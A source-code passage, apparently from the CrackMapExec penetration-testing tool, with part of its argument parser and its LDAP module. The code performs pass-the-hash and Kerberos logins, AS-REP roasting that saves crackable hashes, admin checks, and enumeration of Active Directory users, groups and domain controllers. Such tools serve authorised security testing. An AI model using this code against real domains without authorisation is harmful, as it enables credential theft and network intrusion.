passwords\")\n ggroup.add_argument(\"--gmsa-convert-id\", help=\"Get the secret name of specific gmsa or all gmsa if no gmsa provided\")\n ggroup.add_argument(\"--gmsa-decrypt-lsa\", help=\"Decrypt the gmsa encrypted value from LSA\")\n\n bgroup = ldap_parser.add_argument_group(\"Bloodhound scan\", \"Options to play with bloodhoud\")\n bgroup.add_argument(\"--bloodhound\", action=\"store_true\", help=\"Perform bloodhound scan\")\n bgroup.add_argument(\"-ns\", '--nameserver', help=\"Custom DNS IP\")\n bgroup.add_argument(\"-c\", \"--collection\", help=\"Which information to collect. Supported: Group, LocalAdmin, Session, Trusts, Default, DCOnly, DCOM, RDP, PSRemote, LoggedOn, Container, ObjectProps, ACL, All. You can specify more than one by separating them with a comma. (default: Default)'\")\n\n return parser\n\ndef get_conditional_action(baseAction):\n class ConditionalAction(baseAction):\n def __init__(self, option_strings, dest, **kwargs):\n x = kwargs.pop('make_required', [])\n super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)\n self.make_required = x\n\n def __call__(self, parser, namespace, values, option_string=None):\n for x in self.make_required:\n x.required = True\n super(ConditionalAction, self).__call__(parser, namespace, values, option_string)\n\n return ConditionalAction" }, { "path": "cme/protocols/ldap.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py\n# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf\nimport hashlib\nimport hmac\nimport os\nimport socket\nfrom binascii import hexlify\nfrom datetime import datetime\nfrom re import sub, I\nfrom zipfile import ZipFile\nfrom termcolor import colored\n\nfrom Cryptodome.Hash import MD4\nfrom OpenSSL.SSL import SysCallError\nfrom bloodhound.ad.authentication import ADAuthentication\nfrom bloodhound.ad.domain import AD\nfrom impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE\nfrom impacket.dcerpc.v5.samr import (\n UF_ACCOUNTDISABLE,\n UF_DONT_REQUIRE_PREAUTH,\n UF_TRUSTED_FOR_DELEGATION,\n UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION,\n)\nfrom impacket.dcerpc.v5.transport import DCERPCTransportFactory\nfrom impacket.krb5 import constants\nfrom impacket.krb5.kerberosv5 import getKerberosTGS, SessionKeyDecryptionError\nfrom impacket.krb5.types import Principal, KerberosException\nfrom impacket.ldap import ldap as ldap_impacket\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.smb import SMB_DIALECT\nfrom impacket.smbconnection import SMBConnection, SessionError\n\nfrom cme.config import process_secret, host_info_colors\nfrom cme.connection import *\nfrom cme.helpers.bloodhound import add_user_bh\nfrom cme.logger import CMEAdapter, cme_logger\nfrom cme.protocols.ldap.bloodhound import BloodHound\nfrom cme.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB\nfrom cme.protocols.ldap.kerberos import KerberosAttacks\n\nldap_error_status = {\n \"1\": \"STATUS_NOT_SUPPORTED\",\n \"533\": \"STATUS_ACCOUNT_DISABLED\",\n \"701\": \"STATUS_ACCOUNT_EXPIRED\",\n \"531\": \"STATUS_ACCOUNT_RESTRICTION\",\n \"530\": \"STATUS_INVALID_LOGON_HOURS\",\n \"532\": \"STATUS_PASSWORD_EXPIRED\",\n \"773\": \"STATUS_PASSWORD_MUST_CHANGE\",\n \"775\": \"USER_ACCOUNT_LOCKED\",\n \"50\": \"LDAP_INSUFFICIENT_ACCESS\",\n \"0\": \"LDAP Signing IS Enforced\",\n \"KDC_ERR_CLIENT_REVOKED\": \"KDC_ERR_CLIENT_REVOKED\",\n \"KDC_ERR_PREAUTH_FAILED\": \"KDC_ERR_PREAUTH_FAILED\",\n}\n\n\ndef resolve_collection_methods(methods):\n \"\"\"\n Convert methods (string) to list of validated methods to resolve\n \"\"\"\n valid_methods = [\n \"group\",\n \"localadmin\",\n \"session\",\n \"trusts\",\n \"default\",\n \"all\",\n \"loggedon\",\n \"objectprops\",\n \"experimental\",\n \"acl\",\n \"dcom\",\n \"rdp\",\n \"psremote\",\n \"dconly\",\n \"container\",\n ]\n default_methods = [\"group\", \"localadmin\", \"session\", \"trusts\"]\n # Similar to SharpHound, All is not really all, it excludes loggedon\n all_methods = [\n \"group\",\n \"localadmin\",\n \"session\",\n \"trusts\",\n \"objectprops\",\n \"acl\",\n \"dcom\",\n \"rdp\",\n \"psremote\",\n \"container\",\n ]\n # DC only, does not collect to computers\n dconly_methods = [\"group\", \"trusts\", \"objectprops\", \"acl\", \"container\"]\n if \",\" in methods:\n method_list = [method.lower() for method in methods.split(\",\")]\n validated_methods = []\n for method in method_list:\n if method not in valid_methods:\n cme_logger.error(\"Invalid collection method specified: %s\", method)\n return False\n\n if method == \"default\":\n validated_methods += default_methods\n elif method == \"all\":\n validated_methods += all_methods\n elif method == \"dconly\":\n validated_methods += dconly_methods\n else:\n validated_methods.append(method)\n return set(validated_methods)\n else:\n validated_methods = []\n # It is only one\n method = methods.lower()\n if method in valid_methods:\n if method == \"default\":\n validated_methods += default_methods\n elif method == \"all\":\n validated_methods += all_methods\n elif method == \"dconly\":\n validated_methods += dconly_methods\n else:\n validated_methods.append(method)\n return set(validated_methods)\n else:\n cme_logger.error(\"Invalid collection method specified: %s\", method)\n return False\n\nclass ldap(connection):\n def __init__(self, args, db, host):\n self.domain = None\n self.server_os = None\n self.os_arch = 0\n self.hash = None\n self.ldapConnection = None\n self.lmhash = \"\"\n self.nthash = \"\"\n self.baseDN = \"\"\n self.target = \"\"\n self.targetDomain = \"\"\n self.remote_ops = None\n self.bootkey = None\n self.output_filename = None\n self.smbv1 = None\n self.signing = False\n self.admin_privs = False\n self.no_ntlm = False\n self.sid_domain = \"\"\n\n connection.__init__(self, args, db, host)\n\n def proto_logger(self):\n # self.logger = cme_logger\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"LDAP\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n }\n )\n\n def get_ldap_info(self, host):\n try:\n proto = \"ldaps\" if (self.args.gmsa or self.args.port == 636) else \"ldap\"\n ldap_url = f\"{proto}://{host}\"\n self.logger.info(f\"Connecting to {ldap_url} with no baseDN\")\n try:\n ldap_connection = ldap_impacket.LDAPConnection(ldap_url)\n if ldap_connection:\n self.logger.debug(f\"ldap_connection: {ldap_connection}\")\n except SysCallError as e:\n if proto == \"ldaps\":\n self.logger.debug(f\"LDAPs connection to {ldap_url} failed - {e}\")\n # https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority\n self.logger.debug(f\"Even if the port is open, LDAPS may not be configured\")\n else:\n self.logger.debug(f\"LDAP connection to {ldap_url} failed: {e}\")\n return [None, None, None]\n\n resp = ldap_connection.search(\n scope=ldapasn1_impacket.Scope(\"baseObject\"),\n attributes=[\"defaultNamingContext\", \"dnsHostName\"],\n sizeLimit=0,\n )\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n target = None\n target_domain = None\n base_dn = None\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"defaultNamingContext\":\n base_dn = str(attribute[\"vals\"][0])\n target_domain = sub(\n \",DC=\",\n \".\",\n base_dn[base_dn.lower().find(\"dc=\") :],\n flags=I,\n )[3:]\n if str(attribute[\"type\"]) == \"dnsHostName\":\n target = str(attribute[\"vals\"][0])\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n self.logger.info(f\"Skipping item, cannot process due to error {e}\")\n except OSError as e:\n return [None, None, None]\n self.logger.debug(f\"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}\")\n return [target, target_domain, base_dn]\n\n def get_os_arch(self):\n try:\n string_binding = rf\"ncacn_ip_tcp:{self.host}[135]\"\n transport = DCERPCTransportFactory(string_binding)\n transport.set_connect_timeout(5)\n dce = transport.get_dce_rpc()\n if self.args.kerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.connect()\n try:\n dce.bind(\n MSRPC_UUID_PORTMAP,\n transfer_syntax=(\"71710533-BEBA-4937-8319-B5DBEF9CCC36\", \"1.0\"),\n )\n except DCERPCException as e:\n if str(e).find(\"syntaxes_not_supported\") >= 0:\n dce.disconnect()\n return 32\n else:\n dce.disconnect()\n return 64\n except Exception as e:\n self.logger.fail(f\"Error retrieving os arch of {self.host}: {str(e)}\")\n\n return 0\n\n def get_ldap_username(self):\n extended_request = ldapasn1_impacket.ExtendedRequest()\n extended_request[\"requestName\"] = \"1.3.6.1.4.1.4203.1.11.3\" # whoami\n\n response = self.ldapConnection.sendReceive(extended_request)\n for message in response:\n search_result = message[\"protocolOp\"].getComponent()\n if search_result[\"resultCode\"] == ldapasn1_impacket.ResultCode(\"success\"):\n response_value = search_result[\"responseValue\"]\n if response_value.hasValue():\n value = response_value.asOctets().decode(response_value.encoding)[2:]\n return value.split(\"\\\\\")[1]\n return \"\"\n\n def enum_host_info(self):\n self.target, self.targetDomain, self.baseDN = self.get_ldap_info(self.host)\n self.hostname = self.target\n self.domain = self.targetDomain\n # smb no open, specify the domain\n if self.args.no_smb:\n self.domain = self.args.domain\n else:\n self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]\n\n try:\n self.conn.login(\"\", \"\")\n except BrokenPipeError as e:\n self.logger.fail(f\"Broken Pipe Error while attempting to login: {e}\")\n except Exception as e:\n if \"STATUS_NOT_SUPPORTED\" in str(e):\n self.no_ntlm = True\n pass\n if not self.no_ntlm:\n self.domain = self.conn.getServerDNSDomainName()\n self.hostname = self.conn.getServerName()\n self.server_os = self.conn.getServerOS()\n self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection[\"RequireSigning\"]\n self.os_arch = self.get_os_arch()\n self.logger.extra[\"hostname\"] = self.hostname\n\n if not self.domain:\n self.domain = self.hostname\n\n try:\n # DC's seem to want us to logoff first, windows workstations sometimes reset the connection\n self.conn.logoff()\n except:\n pass\n\n if self.args.domain:\n self.domain = self.args.domain\n if self.args.local_auth:\n self.domain = self.hostname\n\n # Re-connect since we logged off\n self.create_conn_obj()\n self.output_filename = os.path.expanduser(f\"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}\".replace(\":\", \"-\"))\n\n def print_host_info(self):\n self.logger.debug(\"Printing host info for LDAP\")\n if self.args.no_smb:\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"389\"\n self.logger.display(f\"Connecting to LDAP {self.hostname}\")\n # self.logger.display(self.endpoint)\n else:\n self.logger.extra[\"protocol\"] = \"SMB\" if not self.no_ntlm else \"LDAP\"\n self.logger.extra[\"port\"] = \"445\" if not self.no_ntlm else \"389\"\n signing = colored(f\"signing:{self.signing}\", host_info_colors[0], attrs=['bold']) if self.signing else colored(f\"signing:{self.signing}\", host_info_colors[1], attrs=['bold'])\n smbv1 = colored(f\"SMBv1:{self.smbv1}\", host_info_colors[2], attrs=['bold']) if self.smbv1 else colored(f\"SMBv1:{self.smbv1}\", host_info_colors[3], attrs=['bold'])\n self.logger.display(f\"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) ({signing}) ({smbv1})\")\n self.logger.extra[\"protocol\"] = \"LDAP\"\n # self.logger.display(self.endpoint)\n return True\n\n def kerberos_login(\n self,\n domain,\n username,\n password=\"\",\n ntlm_hash=\"\",\n aesKey=\"\",\n kdcHost=\"\",\n useCache=False,\n ):\n # cme_logger.getLogger(\"impacket\").disabled = True\n self.username = username\n self.password = password\n self.domain = domain\n self.kdcHost = kdcHost\n self.aesKey = aesKey\n\n lmhash = \"\"\n nthash = \"\"\n self.username = username\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n self.hash = nthash\n else:\n nthash = ntlm_hash\n self.hash = ntlm_hash\n if lmhash:\n self.lmhash = lmhash\n if nthash:\n self.nthash = nthash\n\n if self.password == \"\" and self.args.asreproast:\n hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_tgt:\n self.logger.highlight(f\"{hash_tgt}\")\n with open(self.args.asreproast, \"a+\") as hash_asreproast:\n hash_asreproast.write(hash_tgt + \"\\n\")\n return False\n\n if not all(\"\" == s for s in [self.nthash, password, aesKey]):\n kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)\n else:\n kerb_pass = \"\"\n\n try:\n # Connect to LDAP\n proto = \"ldaps\" if (self.args.gmsa or self.args.port == 636) else \"ldap\"\n ldap_url = f\"{proto}://{self.target}\"\n self.logger.info(f\"Connecting to {ldap_url} - {self.baseDN} [1]\")\n self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)\n self.ldapConnection.kerberosLogin(\n username,\n password,\n domain,\n self.lmhash,\n self.nthash,\n aesKey,\n kdcHost=kdcHost,\n useCache=useCache,\n )\n\n if self.username == \"\":\n self.username = self.get_ldap_username()\n\n self.check_if_admin()\n\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n out = f\"{domain}\\\\{self.username}{used_ccache} {self.mark_pwned()}\"\n\n # out = f\"{domain}\\\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')}\"\n\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"636\" if (self.args.gmsa or self.args.port == 636) else \"389\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except SessionKeyDecryptionError:\n # for PRE-AUTH account\n self.logger.success(\n f\"{domain}\\\\{self.username}{' account vulnerable to asreproast attack'} {''}\",\n color=\"yellow\",\n )\n return False\n except SessionError as e:\n error, desc = e.getErrorString()\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}{used_ccache} {str(error)}\",\n color=\"magenta\" if error in ldap_error_status else \"red\",\n )\n return False\n except (KeyError, KerberosException, OSError) as e:\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {str(e)}\",\n color=\"red\",\n )\n return False\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find(\"strongerAuthRequired\") >= 0:\n # We need to try SSL\n try:\n # Connect to LDAPS\n ldaps_url = f\"ldaps://{self.target}\"\n self.logger.info(f\"Connecting to {ldaps_url} - {self.baseDN} [2]\")\n self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)\n self.ldapConnection.kerberosLogin(\n username,\n password,\n domain,\n self.lmhash,\n self.nthash,\n aesKey,\n kdcHost=kdcHost,\n useCache=useCache,\n )\n\n if self.username == \"\":\n self.username = self.get_ldap_username()\n\n self.check_if_admin()\n\n # Prepare success credential text\n out = f\"{domain}\\\\{self.username} {self.mark_pwned()}\"\n\n self.logger.extra[\"protocol\"] = \"LDAPS\"\n self.logger.extra[\"port\"] = \"636\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except SessionError as e:\n error, desc = e.getErrorString()\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {str(error)}\",\n color=\"magenta\" if error in ldap_error_status else \"red\",\n )\n return False\n except:\n error_code = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}\",\n color=\"magenta\" if error_code in ldap_error_status else \"red\",\n )\n return False\n else:\n error_code = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}\",\n color=\"magenta\" if error_code in ldap_error_status else \"red\",\n )\n return False\n\n def plaintext_login(self, domain, username, password):\n self.username = username\n self.password = password\n self.domain = domain\n\n if self.password == \"\" and self.args.asreproast:\n hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_tgt:\n self.logger.highlight(f\"{hash_tgt}\")\n with open(self.args.asreproast, \"a+\") as hash_asreproast:\n hash_asreproast.write(hash_tgt + \"\\n\")\n return False\n\n try:\n # Connect to LDAP\n proto = \"ldaps\" if (self.args.gmsa or self.args.port == 636) else \"ldap\"\n ldap_url = f\"{proto}://{self.target}\"\n self.logger.debug(f\"Connecting to {ldap_url} - {self.baseDN} [3]\")\n self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.check_if_admin()\n\n # Prepare success credential text\n out = f\"{domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}\"\n\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"636\" if (self.args.gmsa or self.args.port == 636) else \"389\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find(\"strongerAuthRequired\") >= 0:\n # We need to try SSL\n try:\n # Connect to LDAPS\n ldaps_url = f\"ldaps://{self.target}\"\n self.logger.info(f\"Connecting to {ldaps_url} - {self.baseDN} [4]\")\n self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)\n self.ldapConnection.login(\n self.username,\n self.password,\n self.domain,\n self.lmhash,\n self.nthash,\n )\n self.check_if_admin()\n\n # Prepare success credential text\n out = f\"{domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}\"\n self.logger.extra[\"protocol\"] = \"LDAPS\"\n self.logger.extra[\"port\"] = \"636\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except:\n error_code = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}\",\n color=\"magenta\" if (error_code in ldap_error_status and error_code != 1) else \"red\",\n )\n else:\n error_code = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}\",\n color=\"magenta\" if (error_code in ldap_error_status and error_code != 1) else \"red\",\n )\n return False\n except OSError as e:\n self.logger.fail(f\"{self.domain}\\\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \\nError: {e}\")\n return False\n\n def hash_login(self, domain, username, ntlm_hash):\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"389\"\n lmhash = \"\"\n nthash = \"\"\n\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n else:\n nthash = ntlm_hash\n\n self.hash = ntlm_hash\n if lmhash:\n self.lmhash = lmhash\n if nthash:\n self.nthash = nthash\n\n self.username = username\n self.domain = domain\n\n if self.hash == \"\" and self.args.asreproast:\n hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_tgt:\n self.logger.highlight(f\"{hash_tgt}\")\n with open(self.args.asreproast, \"a+\") as hash_asreproast:\n hash_asreproast.write(hash_tgt + \"\\n\")\n return False\n\n try:\n # Connect to LDAP\n proto = \"ldaps\" if (self.args.gmsa or self.args.port == 636) else \"ldap\"\n ldaps_url = f\"{proto}://{self.target}\"\n self.logger.info(f\"Connecting to {ldaps_url} - {self.baseDN}\")\n self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.check_if_admin()\n\n # Prepare success credential text\n out = f\"{domain}\\\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}\"\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"636\" if (self.args.gmsa or self.args.port == 636) else \"389\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find(\"strongerAuthRequired\") >= 0:\n try:\n # We need to try SSL\n ldaps_url = f\"{proto}://{self.target}\"\n self.logger.debug(f\"Connecting to {ldaps_url} - {self.baseDN}\")\n self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)\n self.ldapConnection.login(\n self.username,\n self.password,\n self.domain,\n self.lmhash,\n self.nthash,\n )\n self.check_if_admin()\n\n # Prepare success credential text\n out = f\"{domain}\\\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}\"\n self.logger.extra[\"protocol\"] = \"LDAPS\"\n self.logger.extra[\"port\"] = \"636\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except ldap_impacket.LDAPSessionError as e:\n error_code = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}\",\n color=\"magenta\" if (error_code in ldap_error_status and error_code != 1) else \"red\",\n )\n else:\n error_code = str(e).split()[-2][:-1]\n self.logger.fail(\n f\"{self.domain}\\\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}\",\n color=\"magenta\" if (error_code in ldap_error_status and error_code != 1) else \"red\",\n )\n return False\n except OSError as e:\n self.logger.fail(f\"{self.domain}\\\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \\nError: {e}\")\n return False\n\n def create_smbv1_conn(self):\n self.logger.debug(f\"Creating smbv1 connection object\")\n try:\n self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)\n self.smbv1 = True\n if self.conn:\n self.logger.debug(f\"SMBv1 Connection successful\")\n except socket.error as e:\n if str(e).find(\"Connection reset by peer\") != -1:\n self.logger.debug(f\"SMBv1 might be disabled on {self.host}\")\n return False\n except Exception as e:\n self.logger.debug(f\"Error creating SMBv1 connection to {self.host}: {e}\")\n return False\n return True\n\n def create_smbv3_conn(self):\n self.logger.debug(f\"Creating smbv3 connection object\")\n try:\n self.conn = SMBConnection(self.host, self.host, None, 445)\n self.smbv1 = False\n if self.conn:\n self.logger.debug(f\"SMBv3 Connection successful\")\n except socket.error:\n return False\n except Exception as e:\n self.logger.debug(f\"Error creating SMBv3 connection to {self.host}: {e}\")\n return False\n\n return True\n\n def create_conn_obj(self):\n if not self.args.no_smb:\n if self.create_smbv1_conn():\n return True\n elif self.create_smbv3_conn():\n return True\n return False\n else:\n return True\n\n def get_sid(self):\n self.logger.highlight(f\"Domain SID {self.sid_domain}\")\n\n def sid_to_str(self, sid):\n try:\n # revision\n revision = int(sid[0])\n # count of sub authorities\n sub_authorities = int(sid[1])\n # big endian\n identifier_authority = int.from_bytes(sid[2:8], byteorder=\"big\")\n # If true then it is represented in hex\n if identifier_authority >= 2**32:\n identifier_authority = hex(identifier_authority)\n\n # loop over the count of small endians\n sub_authority = \"-\" + \"-\".join([str(int.from_bytes(sid[8 + (i * 4) : 12 + (i * 4)], byteorder=\"little\")) for i in range(sub_authorities)])\n object_sid = \"S-\" + str(revision) + \"-\" + str(identifier_authority) + sub_authority\n return object_sid\n except Exception:\n pass\n return sid\n\n def check_if_admin(self):\n # 1. get SID of the domaine\n search_filter = \"(userAccountControl:1.2.840.113556.1.4.803:=8192)\"\n attributes = [\"objectSid\"]\n resp = self.search(search_filter, attributes, sizeLimit=0)\n answers = []\n if resp and self.password != \"\" and self.username != \"\":\n for attribute in resp[0][1]:\n if str(attribute[\"type\"]) == \"objectSid\":\n sid = self.sid_to_str(attribute[\"vals\"][0])\n self.sid_domain = \"-\".join(sid.split(\"-\")[:-1])\n\n # 2. get all group cn name\n search_filter = \"(|(objectSid=\" + self.sid_domain + \"-512)(objectSid=\" + self.sid_domain + \"-544)(objectSid=\" + self.sid_domain + \"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))\"\n attributes = [\"distinguishedName\"]\n resp = self.search(search_filter, attributes, sizeLimit=0)\n answers = []\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"distinguishedName\":\n answers.append(str(\"(memberOf:1.2.840.113556.1.4.1941:=\" + attribute[\"vals\"][0] + \")\"))\n\n # 3. get member of these groups\n search_filter = \"(&(objectCategory=user)(sAMAccountName=\" + self.username + \")(|\" + \"\".join(answers) + \"))\"\n attributes = [\"\"]\n resp = self.search(search_filter, attributes, sizeLimit=0)\n answers = []\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n if item:\n self.admin_privs = True\n\n def getUnixTime(self, t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def search(self, searchFilter, attributes, sizeLimit=0):\n try:\n if self.ldapConnection:\n self.logger.debug(f\"Search Filter={searchFilter}\")\n \n # Microsoft Active Directory set an hard limit of 1000 entries returned by any search\n paged_search_control = ldapasn1_impacket.SimplePagedResultsControl(criticality=True, size=1000)\n resp = self.ldapConnection.search(\n searchFilter=searchFilter,\n attributes=attributes,\n sizeLimit=sizeLimit,\n searchControls=[paged_search_control],\n )\n return resp\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find(\"sizeLimitExceeded\") >= 0:\n # We should never reach this code as we use paged search now\n self.logger.fail(\"sizeLimitExceeded exception caught, giving up and processing the data received\")\n resp = e.getAnswers()\n pass\n else:\n self.logger.fail(e)\n return False\n return False\n\n def users(self):\n # Building the search filter\n search_filter = \"(sAMAccountType=805306368)\" if self.username != \"\" else \"(objectclass=*)\"\n attributes = [\n \"sAMAccountName\",\n \"description\",\n \"badPasswordTime\",\n \"badPwdCount\",\n \"pwdLastSet\",\n ]\n\n resp = self.search(search_filter, attributes, sizeLimit=0)\n if resp:\n answers = []\n self.logger.display(f\"Total of records returned {len(resp):d}\")\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n sAMAccountName = \"\"\n badPasswordTime = \"\"\n badPwdCount = 0\n description = \"\"\n pwdLastSet = \"\"\n try:\n if self.username == \"\":\n self.logger.highlight(f\"{item['objectName']}\")\n else:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"description\":\n description = str(attribute[\"vals\"][0])\n self.logger.highlight(f\"{sAMAccountName:<30} {description}\")\n except Exception as e:\n self.logger.debug(f\"Skipping item, cannot process due to error {e}\")\n pass\n return\n\n def groups(self):\n # Building the search filter\n search_filter = \"(objectCategory=group)\"\n attributes = [\"name\"]\n resp = self.search(search_filter, attributes, 0)\n if resp:\n answers = []\n self.logger.debug(f\"Total of records returned {len(resp):d}\")\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n name = \"\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"name\":\n name = str(attribute[\"vals\"][0])\n self.logger.highlight(f\"{name}\")\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n self.logger.debug(f\"Skipping item, cannot process due to error {e}\")\n pass\n return\n \n def dc_list(self):\n \n # Building the search filter\n search_filter = \"(&(objectCategory=computer)(primaryGroupId=516))\"\n attributes = [\"dNSHostName\"]\n resp = self.search(search_filter, attributes, 0)\n for item in resp: \n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n name = \"\"\n try: \t \n \tfor attribute in item[\"attributes\"]: \n \t if str(attribute[\"type\"]) == \"dNSHostName\":\n \t name = str(attribute[\"vals\"][0])\n \ttry:\n \t ip_address = socket.gethostbyname(name.split(\".\")[0])\n \t if ip_address != True and name != \"\":\n \t self.logger.highlight(f\"{name} =\", ip_address) \t \n \texcept socket.gaierror:\n \t self.logger.fail(f\"{name} = Connection timeout\")\n except Exception as e:\n self.logger.fail(\"Exception:\", exc_info=True)\n self.logger.fail(f\"Skipping item, cannot process due to error {e}\")\n\n def asreproast(self):\n if self.password == \"\" and self.nthash == \"\" and self.kerberos is False:\n return False\n # Building the search filter\n search_filter = \"(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)\" \"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))\" 